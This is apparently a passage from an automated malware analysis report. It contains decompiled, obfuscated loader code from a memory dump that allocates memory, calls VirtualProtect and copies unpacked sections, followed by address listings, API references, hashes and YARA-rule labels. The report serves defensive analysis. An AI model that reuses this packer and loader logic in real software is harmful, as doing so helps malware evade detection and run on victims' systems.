					 *_t418 = _t981;
					_t986 = _v12;
					 *_t1144 = 2;
					_v12 = _v12 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t986;
					_t423 = _t824 + 0x41cfff; // 0x41cfff
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t423;
					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + _t773;
					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
					 *_t1144 =  *_t1144 - _t1112;
					 *_t1144 =  *_t1144 | _t425;
					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
					_t1132 =  &(_t1144[1]);
					 *_t427 = _t775;
					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
					_push(_v20);
					_pop(_t776);
					_t1054 = _t1052;
					 *_t1132 = _t1054;
					_t879 =  *(_t824 + 0x41d0fa);
					_t1057 = 0;
					if(_t879 > _t776) {
						_t432 = _t824 + 0x41cfff; // 0x41cfff
						 *_t1132 =  *_t1132 - _t1112;
						 *_t1132 =  *_t1132 + _t432;
						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
						 *_t1132 =  *_t1132 ^ _t1112;
						 *_t1132 =  *_t1132 + _t433;
						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
						_v12 = _t1097;
						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
						_t1097 = _v12;
					}
					_pop( *_t438);
					_t987 = _v12;
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 = _t987;
					_t440 = _t824 + 0x41c42d; // 0x41c42d
					 *_t1132 =  *_t1132 - _t1097;
					 *_t1132 =  *_t1132 + _t440;
					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
					 *_t1132 = _t1057;
					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
					_t1060 = 0;
					_v16 = _v16 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1060;
					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t446;
					_t449 = _t824 + 0x41c298; // 0x41c298
					 *_t1132 =  *_t1132 ^ _t1097;
					 *_t1132 = _t449;
					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
					_v16 = _t987;
					 *(_t824 + 0x41c405) = 0 ^ _t781;
					_t947 = _v16;
					VirtualProtect(_t1097, _v12, _v16, ??);
					_t455 = _t824 + 0x41c772; // 0x41c772
					_v20 = 0;
					 *_t1132 =  *_t1132 ^ _t455;
					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 =  *_t1132 | _t458;
					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
					_v12 = _t1060;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
					_t1023 = _v12;
				}
				_pop( *_t467);
				_v16 = 0;
				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
				 *_t1132 =  *_t1132 ^ _t879;
				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
				_v16 = _t947;
				 *(_t824 + 0x41c775) = 0 ^ _t701;
				_t950 = _v16;
				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
				_t827 = _t824;
				_v20 = 0;
				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
				_v16 = _v16 & 0x00000000;
				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
				_pop( *_t485);
				_push(_v12);
				_pop( *_t487);
				do {
					 *_t1132 = _t1026;
					 *_t1132 =  *_t1132 ^ _t879;
					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 | _t706;
					 *_t1132 = _t827 + 0x41ca40;
					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
					_t1133 = _t1132 - 0xfffffffc;
					 *_t497 = _t708;
					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v12);
					_pop(_t709);
					_t1028 = _t1026;
					_v16 = _t950;
					_t882 = 0 ^  *(_t827 + 0x41d332);
					_t953 = _v16;
					if(_t882 > _t709) {
						 *_t1133 =  *_t1133 ^ _t1112;
						 *_t1133 = _t827 + 0x41c966;
						 *_t1133 =  *_t1133 & 0x00000000;
						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
					}
					 *_t1133 = _t882;
					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
					_v20 = _t1028;
					_t1031 = _v20;
					_v20 = _v20 & 0x00000000;
					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
					 *_t1133 = _t711;
					_v16 = _v16 & 0x00000000;
					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
					_t1134 =  &(_t1133[1]);
					_v20 = _a4;
					_push( *_t1133 + _t713);
					_t1085 = _v20;
					_pop(_t714);
					_push( *((intOrPtr*)(_t827 + 0x41cece)));
					_pop( *_t525);
					_push(_v20);
					_pop(_t888);
					if(_t888 > _t714) {
						 *_t1134 =  *_t1134 - _t888;
						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
						_v20 = _v20 & 0x00000000;
						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
					}
					_v12 = _t1085;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
					 *_t1134 = _t1112;
					_t889 = 0 ^  *(_t1031 + 0x10);
					_t1112 = 0;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 ^ _t889;
					_v20 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
					 *_t1134 =  *_t1134 ^ _t1112;
					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
					_v20 = _t1031;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
					_t1034 = _v20;
					 *_t552 = _t1112;
					_push(_v12);
					_pop( *_t555);
					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
					_push(_v16);
					_pop(_t1089);
					_t955 = _t953;
					_v16 = 0;
					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
					_v12 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
					 *_t1134 = _t955;
					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
					_t958 = 0;
					_pop( *_t567);
					_t893 = _v16;
					_t1035 =  *(_t1034 + 0xc);
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t893;
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 = _t827 + 0x41c5a4;
					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 =  *_t1134 ^ _t722;
					 *_t1134 =  *_t1134 ^ _t1035;
					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
					 *_t574 = _t1035;
					 *_t1134 =  *_t1134 + _t827;
					_t828 = _t724;
					_t827 = 0;
					_push( *((intOrPtr*)(_t827 + 0x41d348)));
					_pop( *_t577);
					_push(_v12);
					_pop(_t896);
					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
						 *_t1134 =  *_t1134 ^ _t958;
						 *_t1134 =  *_t1134 | _t579;
						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
						 *_t1134 =  *_t1134 - _t896;
						 *_t1134 =  *_t1134 | _t580;
						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
						_v20 = _t1089;
						 *(_t827 + 0x41c50f) = 0 ^ _t733;
						_t1089 = _v20;
					}
					_v12 = _t958;
					_t1036 =  *(_t827 + 0x41c166) + _t1035;
					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
					_t1136 =  &(_t1134[4]);
					_t879 = 0;
					_t1132 = _t1136 - 0xfffffffc;
					_push(_v12);
					_t1026 =  *_t1136 + 0x28;
					_pop(_t950);
					_t588 =  &_v8;
					 *_t588 = _v8 - 1;
				} while ( *_t588 != 0);
				_pop( *_t590);
				_t1041 = _v16;
				_push(_t1112);
				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
				_v20 = _v20 +  *(_t827 + 0x41c166);
				_push(_v20);
				_pop(_t729);
				_t1043 = _t1041;
				 *_t1132 = _t950;
				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
				_t966 = 0;
				_v12 = 0;
				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
				_t901 = _v12;
				if(_t1091 > 0) {
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1091;
					_t730 = E02274E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
					 *_t1132 = _t1091;
					_t729 = E02272FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
				}
				_pop( *_t603);
				return _t729;
			}

0x02275f16
0x02275f16
0x02275f16
0x02275f17
0x02275f1b
0x02275f1e
0x02275f20
0x02275f23
0x02275f24
0x02275f28
0x02275f2b
0x02275f2c
0x02275f30
0x02275f39
0x02275f3a
0x02275f3d
0x02275f46
0x02275f4a
0x02275f4d
0x02275f56
0x02275f57
0x02275f5a
0x02275f5d
0x02275f63
0x02275f66
0x02275f6e
0x02275f71
0x02275f72
0x02275f75
0x02275f78
0x02275f7b
0x02275f84
0x02275f85
0x02275f88
0x02275f8b
0x02275f91
0x02275f94
0x02275f9d
0x02275f9e
0x02275fa2
0x02275fa5
0x02275fab
0x02275fb1
0x02275fb5
0x02275fb8
0x02275fbb
0x02275fbe
0x02275fc0
0x02275fcb
0x02275fd2
0x02275fda
0x02275fdd
0x02275fe6
0x02275fe7
0x02275fea
0x02275ff3
0x02275ff4
0x02275ff7
0x02275ffa
0x02275ffa
0x02276002
0x02276005
0x02276009
0x0227600d
0x02276017
0x0227601b
0x02276025
0x02276029
0x0227602c
0x02276032
0x02276039
0x0227604b
0x02276054
0x0227605e
0x02276067
0x02276068
0x0227606b
0x0227606e
0x02276074
0x0227607b
0x0227607e
0x02276088
0x0227608b
0x02276094
0x02276095
0x02276098
0x0227609b
0x022760a1
0x022760a7
0x022760ae
0x022760b7
0x022760be
0x022760c1
0x022760c8
0x022760cb
0x022760d4
0x022760db
0x022760de
0x022760e4
0x022760e7
0x022760ee
0x022760f1
0x022760f4
0x022760f7
0x022760f8
0x02276106
0x02276108
0x0227610b
0x02276114
0x02276118
0x02276124
0x02276127
0x0227612d
0x02276133
0x0227613a
0x02276140
0x02276147
0x0227614a
0x0227614f
0x02276156
0x0227615c
0x0227615f
0x02276162
0x0227616b
0x0227616e
0x02276172
0x02276176
0x0227617a
0x0227617e
0x02276188
0x0227618c
0x02276195
0x0227619c
0x0227619f
0x022761ab
0x022761b2
0x022761be
0x022761c1
0x022761c8
0x022761d1
0x022761db
0x022761de
0x022761e5
0x022761e8
0x022761f1
0x022761fb
0x022761fe
0x02276206
0x02276209
0x02276210
0x02276213
0x02276216
0x02276219
0x0227621a
0x0227621b
0x02276231
0x02276239
0x02276240
0x02276249
0x02276253
0x02276256
0x02276256
0x0227625e
0x02276265
0x0227626b
0x0227626c
0x02276276
0x02276279
0x02276283
0x0227628c
0x02276296
0x02276299
0x0227629f
0x022762a9
0x022762b5
0x022762b8
0x022762c3
0x022762c6
0x022762cd
0x022762ce
0x022762d1
0x022762d2
0x022762dd
0x022762df
0x022762e4
0x022762ec
0x022762f6
0x02276300
0x02276303
0x02276306
0x0227630c
0x02276314
0x0227631b
0x02276321
0x02276321
0x0227632a
0x0227632d
0x02276335
0x02276338
0x0227633b
0x0227633e
0x0227633f
0x02276343
0x0227634d
0x02276351
0x0227635d
0x02276360
0x02276368
0x0227636f
0x02276375
0x0227637c
0x0227637f
0x02276385
0x02276389
0x0227638c
0x02276396
0x02276399
0x022763a2
0x022763a9
0x022763ac
0x022763b4
0x022763bb
0x022763c1
0x022763c7
0x022763ca
0x022763d1
0x022763d3
0x022763dc
0x022763e6
0x022763e9
0x022763f0
0x022763f3
0x022763fd
0x02276400
0x02276403
0x02276412
0x02276417
0x0227641b
0x0227641e
0x02276420
0x02276421
0x0227642c
0x0227642e
0x02276433
0x0227643c
0x0227643f
0x02276448
0x02276452
0x02276455
0x02276455
0x02276461
0x02276468
0x0227646e
0x02276474
0x02276477
0x02276483
0x02276486
0x0227648c
0x02276494
0x0227649b
0x022764a1
0x022764a6
0x022764b2
0x022764b6
0x022764b9
0x022764c1
0x022764c5
0x022764c8
0x022764d4
0x022764db
0x022764e1
0x022764e3
0x022764e6
0x022764f2
0x022764f5
0x022764fe
0x0227650a
0x0227650d
0x02276515
0x02276518
0x0227651f
0x02276522
0x02276525
0x02276528
0x02276529
0x02276537
0x02276539
0x0227653c
0x0227653e
0x02276544
0x0227654e
0x02276551
0x02276558
0x0227655c
0x0227655f
0x0227655f
0x02276567
0x0227656e
0x02276574
0x02276575
0x02276586
0x02276590
0x02276593
0x0227659a
0x0227659e
0x022765a1
0x022765a9
0x022765b0
0x022765b6
0x022765b7
0x022765ca
0x022765cc
0x022765ce
0x022765d2
0x022765d5
0x022765db
0x022765e5
0x022765e8
0x022765ee
0x022765f6
0x022765fd
0x02276603
0x0227660b
0x02276610
0x02276618
0x0227661b
0x02276622
0x02276625
0x0227662b
0x02276632
0x02276635
0x0227663c
0x02276640
0x02276643
0x0227664a
0x0227664e
0x02276651
0x02276659
0x0227665f
0x02276666
0x02276667
0x0227666a
0x0227666b
0x02276671
0x02276674
0x02276677
0x0227667a
0x02276685
0x0227668f
0x02276693
0x02276696
0x0227669d
0x022766a0
0x022766a3
0x022766a3
0x022766a9
0x022766ac
0x022766af
0x022766c2
0x022766c6
0x022766c9
0x022766d2
0x022766dc
0x022766e8
0x022766eb
0x022766f1
0x022766f8
0x022766fe
0x02276703
0x02276706
0x0227670b
0x0227670e
0x02276713
0x0227671a
0x0227671d
0x02276720
0x02276727
0x02276730
0x0227673a
0x0227673d
0x02276743
0x0227674d
0x02276757
0x0227675b
0x0227675e
0x0227676d
0x02276774
0x02276777
0x0227677a
0x0227677d
0x0227677e
0x0227677f
0x02276781
0x0227678c
0x02276791
0x0227679a
0x0227679d
0x022767a7
0x022767ab
0x022767ae
0x022767b4
0x022767b6
0x022767bd
0x022767c3
0x022767c4
0x022767c7
0x022767cc
0x022767cf
0x022767d2
0x022767d2
0x022767d3
0x022767dd
0x022767e0
0x022767e7
0x022767f1
0x022767f4
0x022767f7
0x022767fe
0x02276801
0x0227680b
0x0227680f
0x02276812
0x0227681d
0x02276824
0x02276827
0x0227682a
0x0227682d
0x0227682e
0x0227682f
0x02276841
0x0227684c
0x02276858
0x0227685b
0x02276861
0x02276868
0x0227686e
0x02276873
0x02276876
0x0227687e
0x02276881
0x02276881
0x02276889
0x0227688d
0x02276897
0x0227689b
0x022768a4
0x022768ae
0x022768b1
0x022768bd
0x022768c4
0x022768cd
0x022768d0
0x022768d3
0x022768e0
0x022768e4
0x022768e7
0x022768f0
0x022768f7
0x02276900
0x02276901
0x02276904
0x02276907
0x02276913
0x02276916
0x02276919
0x02276926
0x0227692f
0x02276939
0x0227693c
0x02276945
0x02276951
0x02276954
0x02276960
0x02276968
0x0227696c
0x02276971
0x02276972
0x0227697d
0x0227697f
0x02276984
0x02276986
0x0227698d
0x02276990
0x02276993
0x0227699a
0x0227699d
0x022769a0
0x022769a6
0x022769ae
0x022769b5
0x022769bb
0x022769c0
0x022769c3
0x022769c6
0x022769cd
0x022769d0
0x022769d6
0x022769d9
0x022769e0
0x022769e4
0x022769e7
0x022769f0
0x022769f3
0x022769fb
0x02276a02
0x02276a08
0x02276a0b
0x02276a0e
0x02276a13
0x02276a1a
0x02276a1e
0x02276a24
0x02276a27
0x02276a30
0x02276a33
0x02276a3f
0x02276a46
0x02276a4f
0x02276a52
0x02276a56
0x02276a5d
0x02276a64
0x02276a67
0x02276a6e
0x02276a72
0x02276a75
0x02276a7c
0x02276a80
0x02276a83
0x02276a8a
0x02276a8d
0x02276a90
0x02276a9f
0x02276aa6
0x02276aa9
0x02276aac
0x02276aaf
0x02276ab0
0x02276ab3
0x02276abe
0x02276ac0
0x02276ac3
0x02276ac5
0x02276acc
0x02276acf
0x02276ad2
0x02276ad9
0x02276adc
0x02276adf
0x02276ae5
0x02276aec
0x02276af2
0x02276af2
0x02276af5
0x02276af8
0x02276afc
0x02276aff
0x02276b02
0x02276b09
0x02276b0c
0x02276b0f
0x02276b17
0x02276b1e
0x02276b24
0x02276b25
0x02276b2c
0x02276b2f
0x02276b35
0x02276b3f
0x02276b42
0x02276b49
0x02276b4c
0x02276b4f
0x02276b55
0x02276b5c
0x02276b62
0x02276b65
0x02276b6b
0x02276b71
0x02276b7b
0x02276b7e
0x02276b85
0x02276b88
0x02276b8b
0x02276b91
0x02276b99
0x02276ba0
0x02276ba6
0x02276ba6
0x02276baf
0x02276bbb
0x02276bc5
0x02276bcf
0x02276bd2
0x02276bd5
0x02276bdb
0x02276be2
0x02276be8
0x02276bf4
0x02276bf6
0x02276bfd
0x02276c07
0x02276c10
0x02276c17
0x02276c20
0x02276c21
0x02276c24
0x02276c27
0x02276c2d
0x02276c30
0x02276c3a
0x02276c3d
0x02276c40
0x02276c46
0x02276c4d
0x02276c59
0x02276c5c
0x02276c6b
0x02276c72
0x02276c75
0x02276c78
0x02276c7b
0x02276c7c
0x02276c7d
0x02276c88
0x02276c8a
0x02276c8f
0x02276c98
0x02276c9b
0x02276ca5
0x02276ca9
0x02276cac
0x02276cac
0x02276cb4
0x02276cbb
0x02276cc2
0x02276ccc
0x02276cd5
0x02276cdc
0x02276cdf
0x02276ce8
0x02276cf1
0x02276cf8
0x02276cfb
0x02276d06
0x02276d09
0x02276d10
0x02276d11
0x02276d14
0x02276d15
0x02276d1b
0x02276d1e
0x02276d21
0x02276d24
0x02276d2d
0x02276d30
0x02276d39
0x02276d40
0x02276d43
0x02276d43
0x02276d49
0x02276d51
0x02276d58
0x02276d63
0x02276d6b
0x02276d6d
0x02276d6f
0x02276d73
0x02276d7c
0x02276d86
0x02276d90
0x02276d93
0x02276d96
0x02276d9c
0x02276da4
0x02276dab
0x02276db1
0x02276dba
0x02276dc4
0x02276dc5
0x02276dc8
0x02276dcb
0x02276dce
0x02276dcf
0x02276dd0
0x02276dda
0x02276de4
0x02276de8
0x02276df1
0x02276dfb
0x02276dfe
0x02276e06
0x02276e0d
0x02276e13
0x02276e16
0x02276e19
0x02276e1c
0x02276e20
0x02276e24
0x02276e2e
0x02276e31
0x02276e34
0x02276e3b
0x02276e3e
0x02276e48
0x02276e4b
0x02276e4e
0x02276e5a
0x02276e62
0x02276e66
0x02276e6b
0x02276e6c
0x02276e72
0x02276e75
0x02276e78
0x02276e7b
0x02276e7d
0x02276e84
0x02276e87
0x02276e8a
0x02276e91
0x02276e94
0x02276e97
0x02276e9d
0x02276ea4
0x02276eaa
0x02276eaa
0x02276eb9
0x02276ec8
0x02276ec9
0x02276ec9
0x02276ec9
0x02276ed4
0x02276ed7
0x02276ee0
0x02276ee2
0x02276ee3
0x02276ee3
0x02276ee3
0x02276eec
0x02276eef
0x02276ef2
0x02276f07
0x02276f0a
0x02276f0d
0x02276f10
0x02276f11
0x02276f14
0x02276f1b
0x02276f21
0x02276f22
0x02276f31
0x02276f33
0x02276f39
0x02276f3c
0x02276f40
0x02276f43
0x02276f4b
0x02276f4e
0x02276f4e
0x02276f61
0x02276f68

APIs

VirtualProtect.KERNELBASE ref: 02276B65

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction ID: b508903177b6f8b3f9c2478bad34401ee7790298320ce8effdf0ad8777d4f362
Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction Fuzzy Hash: 7BC22572848608EFEB049FA0C8C57EEBBF5FF48320F0589ADD899AA145D7345264CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0227709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0227709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
				void* _t47;
				signed int _t48;
				signed int _t49;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				signed int _t59;
				long _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				signed int _t68;
				void* _t72;
				signed int _t75;
				signed int _t78;
				void* _t81;
				signed int _t82;
				long _t87;
				signed int _t89;
				long _t94;
				void* _t97;
				void* _t99;
				long _t101;
				void* _t102;

				_t87 = __esi;
				_t79 = __edi;
				_t72 = __edx;
				_t59 = __ebx;
				 *_t101 = 0xffff0000;
				_t48 = E02272D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
				 *_t101 =  *_t101 | _t59;
				_t60 = _t59;
				if( *_t101 != 0) {
					 *_t101 =  *_t101 + 4;
					 *_t101 =  *_t101 - _t94;
					 *_t101 =  *_t101 + 0x1000;
					 *_t101 =  *_t101 - _t60;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
				}
				 *(_t94 - 8) = 0;
				_push( *(_t94 - 8));
				 *_t101 =  *_t101 ^ _t48;
				_pop( *_t6);
				 *(_t60 + 0x41c60a) = 2;
				 *_t101 = _t94;
				 *(_t60 + 0x41d10e) = _t48;
				_t97 = 0;
				if( *(_t60 + 0x41c166) > 0) {
					_t55 = _t60 + 0x41c60a;
					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
					 *_t101 = _t55 +  *_t101;
					 *_t101 = 0x40;
					_t87 =  *_t101;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
					 *_t101 =  *(_t60 + 0x41c166);
					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
				}
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
				_t89 = _t87;
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
				_t99 = _t97;
				_t49 = E0227746C(_t60, _t72, _t79, _t89);
				_push( *((intOrPtr*)(_t60 + 0x41c627)));
				_pop( *_t24);
				_push( *(_t99 - 8));
				_pop(_t62);
				 *_t101 = _t62;
				_t65 = 0;
				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
				_t81 = _t67;
				_t68 = _t65;
				if(_t67 != 0) {
					 *(_t99 - 8) = 0;
					 *_t101 =  *_t101 ^ _t81;
					_t49 = E02272A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
				}
				_t75 = _t72;
				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
				_t102 = _t101 + 0xc;
				_t82 = _t81 + _t68;
				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
					_push(0);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t82 = _t82; // executed
					_t52 = E02275F16(_t51, _t60, 0, _t75, _t89); // executed
					_push(_t52);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t54 = _t52;
					_t51 = E02278F3B(_t54, _t60, 0, _t75, _t82, _t89);
				}
				 *(_t99 - 4) = _t82;
				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
				 *_t41 =  *(_t60 + 0x41d140);
				_t78 =  *(_t99 - 8);
				_push(_t89);
				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
				asm("popad");
				return _t51;
			}

0x0227709d
0x0227709d
0x0227709d
0x0227709d
0x0227709e
0x022770a5
0x022770ab
0x022770ae
0x022770af
0x022770b2
0x022770b6
0x022770ba
0x022770c1
0x022770cb
0x022770d0
0x022770d0
0x022770d6
0x022770dd
0x022770e0
0x022770e3
0x022770e9
0x022770f5
0x022770fc
0x02277102
0x0227710a
0x0227710c
0x02277112
0x02277119
0x0227711d
0x0227712b
0x0227712b
0x02277135
0x02277138
0x02277138
0x0227713e
0x02277146
0x0227714a
0x0227714b
0x02277153
0x02277157
0x02277158
0x0227715d
0x02277163
0x02277166
0x02277169
0x0227716c
0x02277179
0x0227717d
0x0227717f
0x02277181
0x02277182
0x02277184
0x0227718e
0x02277191
0x02277191
0x0227719d
0x0227719e
0x0227719e
0x0227719e
0x022771a6
0x022771a8
0x022771b0
0x022771b4
0x022771b5
0x022771ba
0x022771c2
0x022771c6
0x022771c7
0x022771c7
0x022771cc
0x022771e0
0x022771ea
0x022771f0
0x022771f1
0x022771f7
0x022771fb
0x022771ff
0x02277201

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 022770D0
VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 02277138

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction ID: ba90ee2ed9af5061499ef451fe535b734b7e4d16a7a2b5e72ac0604cf043274b
Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction Fuzzy Hash: 66416172908304EFEB049F94C885BAEBBF5EF88710F15849DEC88AB259C7741950DF69

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02271B1E, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02271B1E(void* __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t58;
				signed int _t60;
				void* _t77;
				void* _t89;
				void* _t90;
				signed int _t91;
				void* _t95;
				signed int _t96;
				signed int _t97;
				signed int _t101;
				signed int _t105;
				signed int _t106;

				_t89 = __ebx;
				_t58 = E02272467(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x41c395)),  *((intOrPtr*)(__ebx + 0x41c290)),  *((intOrPtr*)(__ebx + 0x41c3b1)));
				if(_t58 < 0xda63) {
					_t58 = (_t58 & 0x00000000) - 0xffffffff;
				} else {
					_a8 = _a8 & 0xffffffff;
					_t105 = _t105 ^  *(__ebx + 0x41c8a6);
				}
				_t106 = _t105 | _t101;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) - 1;
				_v12 = _v12 - 1;
				_t60 = _t58 & 0x00000000;
				_t96 = _t95 - _t60;
				if(_a4 < 0x7e4d) {
					_v16 = 0x581;
					 *(_t89 + 0x41c8a6) = 0xffffffff;
					_t97 = 1;
				} else {
					_t97 = _t96 ^ 0x00000034;
					_a4 = _a4 ^ 0xffffffff;
				}
				_t91 = _t90 - 0xffffffff;
				if(_t60 - 1 >= 0x60f9) {
					 *(_t89 + 0x41c8a6) = 1;
					_v16 = _v16 + 0xfffffe47;
				} else {
					_t106 =  *(_t89 + 0x41c8a6);
				}
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + _t101;
				_v8 = _v8 | _t101;
				_v8 = _v8 - 1;
				_v12 = _v12 ^ 0x00000000;
				 *(_t89 + 0x41c8a6) = 0xfffff898;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) - 1;
				_v16 = 1;
				_a4 = (_t106 + 0x00000001 - 0x00000001 & 0x00000000) + 1;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + (_t91 ^ _t97 & 0x00000000) + 1 + _v12;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + 1;
				_v8 = 1;
